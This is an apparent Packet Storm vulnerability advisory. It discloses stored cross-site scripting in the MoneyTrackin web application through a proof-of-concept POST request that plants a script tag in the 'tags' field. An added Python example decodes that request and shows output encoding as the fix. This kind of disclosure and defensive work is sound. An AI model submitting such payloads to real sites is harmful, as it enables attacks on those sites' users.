MoneyTrackin Web Application Cross Site Scripting

2016-06-25T00:00:00
ID PACKETSTORM:137643
Type packetstorm
Reporter Brett DeWall
Modified 2016-06-25T00:00:00

Description

                                        
`# Exploit Title: MoneyTrackin Web Application - Stored Cross-Site Scripting (XSS)  
# Date: 6/24/16  
# Exploit Author: Brett DeWall  
# Exploit Author Twitter: @xbadbiddyx   
# Exploit Author Blog: http://xbadbiddyx.tumblr.com  
# Vendor Homepage: https://www.moneytrackin.com/  
# Version: Latest commit  
# Contacted Vendor Date: 6/18/16  
  
  
### Vulnerable Request  
Request  
POST /accounting/create_transaction/?project=NULL HTTP/1.1  
Host: www.moneytrackin.com  
  
  
project=NULL&description=Vuln-Test&amount=1000&date=17%2F06%2F2016&tags=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&sent=1&clientDate=2016-06-17&oldproject=NULL  
`
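
Added example, not part of the original advisory or the application's code: it decodes the request body above, reports which form fields carry HTML-significant characters, and contrasts writing the stored `tags` value into a page as-is with HTML-encoding it on output. The `span` markup and the function names are assumptions for illustration; the advisory does not show how the application renders tags.

```python
import html
from urllib.parse import parse_qsl

# Request body copied from the advisory above.
BODY = (
    "project=NULL&description=Vuln-Test&amount=1000&date=17%2F06%2F2016"
    "&tags=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&sent=1"
    "&clientDate=2016-06-17&oldproject=NULL"
)

# Characters that change meaning when placed in HTML text or attribute values.
MARKUP_CHARS = set("<>\"'&")


def decode_form(body):
    """Percent-decode an application/x-www-form-urlencoded body into a dict."""
    return dict(parse_qsl(body, keep_blank_values=True))


def fields_with_markup(body):
    """Names of fields whose decoded value contains HTML-significant characters."""
    return [name for name, value in decode_form(body).items()
            if MARKUP_CHARS & set(value)]


def render_tag_unencoded(tag):
    # Assumed rendering that stored XSS implies: the stored value reaches the
    # page unchanged, so the browser parses it as markup.
    return '<span class="tag">' + tag + "</span>"


def render_tag_encoded(tag):
    # Output encoding: the same stored value is emitted as inert text.
    return '<span class="tag">' + html.escape(tag, quote=True) + "</span>"


if __name__ == "__main__":
    tag = decode_form(BODY)["tags"]
    print("fields carrying markup:", fields_with_markup(BODY))
    print("unencoded:", render_tag_unencoded(tag))
    print("encoded:  ", render_tag_encoded(tag))
```

Encoding at output time neutralises the value even when it was stored before any input validation existed.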